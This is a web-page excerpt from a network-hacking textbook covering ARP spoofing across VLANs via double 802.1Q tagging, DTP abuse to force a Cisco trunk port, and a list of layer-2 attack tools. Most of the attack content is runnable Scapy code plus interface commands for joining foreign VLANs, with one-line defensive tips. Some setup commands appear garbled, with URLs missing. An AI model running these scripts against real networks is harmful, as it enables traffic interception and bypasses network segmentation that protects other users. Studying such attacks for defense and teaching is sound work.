Log in / Register
Home arrow Computer Science arrow Understanding Network Hacks
< Prev   CONTENTS   Next >

4.7 ARP Spoofing Over VLAN Hopping

VLANs limit broadcast traffic to the ports belonging to the same VLAN therefore we cannot by default react to all ARP requests but have to proactively tell the victim our MAC every few seconds like seen in the first ARP spoofing example. The code is identical except for the fact that we tag every packet for our and than additionally for the destination VLAN.

1 #!/usr/bin/python


3 import time

4 from scapy.all import sendp, ARP, Ether, Dot1Q


6 iface = "eth0"

7 target_ip = ''

8 fake_ip = ''

9 fake_mac = 'c0:d3:de:ad:be:ef'

10 our_vlan = 1

11 target_vlan = 2


13 packet = Ether() /

14 Dot1Q(vlan=our_vlan) /

15 Dot1Q(vlan=target_vlan) /

16 ARP(hwsrc=fake_mac,

17 pdst=target_ip,

18 psrc=fake_ip,

19 op="is-at")


21 while True:

22 sendp(packet, iface=iface)

23 time.sleep(10)

Luckily its not that complicated to protect against those kind of VLAN attacks: Just use physically divided switches if you really want to separate your networks!

4.8 DTP Abusing

DTP (Dynamic Trunking Protocol) is a proprietary protocol invented by Cisco to let switches dynamically discuss if a port should be a trunk port. A trunk port is normally used to interconnect switches and routers to share some or all known VLANs.

You need to install the development version of Scapy to be able to execute the following code. To check out the sources please first install Mercurial and afterwards type the next line into the console to clone the Scapy repository.

hg clone scapy

If you want to keep track with the latest version of Scapy you only have to update the checkout from time to time.

cd scapy hg pull

Now you can exchange the old version of Scapy with the latest and greatest.

pip uninstall Scapy cd scapy

python install

Thanks to the DTP protocol and its property to completely overlook any kind of security we now can send a single Dynamic-Desirable packet to every DTP enabled Cisco device and ask it to change our port into a trunk port.

1 #!/usr/bin/python


3 import sys

4 from scapy.layers.l2 import Dot3 , LLC, SNAP

5 from scapy.contrib.dtp import *


7 if len(sys.argv) < 2:

8 print sys.argv[0] + " <dev>"

9 sys.exit()


11 negotiate_trunk(iface=sys.argv[1])

As an optional parameter you can set the MAC address of the spoofed neighbor switch if none is set a random one will be automatically generated.

The attack can last some minutes, but an attacker doesn't care about the delay, because they know what they get in exchange the possibility to connect to every VLAN!

vconfig add eth0 <vlan-id>

ifconfig eth0.<vlan-id> <ip_of_vlan> up

There's no really good reason to use DTP so just disable it!

4.9 Tools

4.9.1 NetCommander

NetCommander is a simple ARP spoofer. It searches for active computers on the network by sending ARP requests to every possible IP. Afterwards you can choose a connection to be hijacked and NetCommander will automatically spoof the connection between those hosts and the default gateway bidirectionally every few seconds.

The source code of the tool can be downloaded from NetCommander

4.9.2 Hacker's Hideaway ARP Attack Tool

Hacker's Hideaway ARP Attack Tool has a few more features than NetCommander. Apart from the spoofing of a specific connection it supports passive spoofing of all ARP requests of a source IP as well as MAC flooding.

The download link of the tool is tar.bz2

4.9.3 Loki

Loki is a layer 2 and 3 attack tool like Yersinia. It can be extended by plugins and has a nice GUI. It implements attacks like ARP spoofing and -flooding, BGP and RIP route injection and even attacks on quite uncommon protocols like HSRP and VRRP.

The source code of Loki can be grabbed from the site html.

Found a mistake? Please highlight the word and press Shift + Enter  
< Prev   CONTENTS   Next >
Business & Finance
Computer Science
Language & Literature
Political science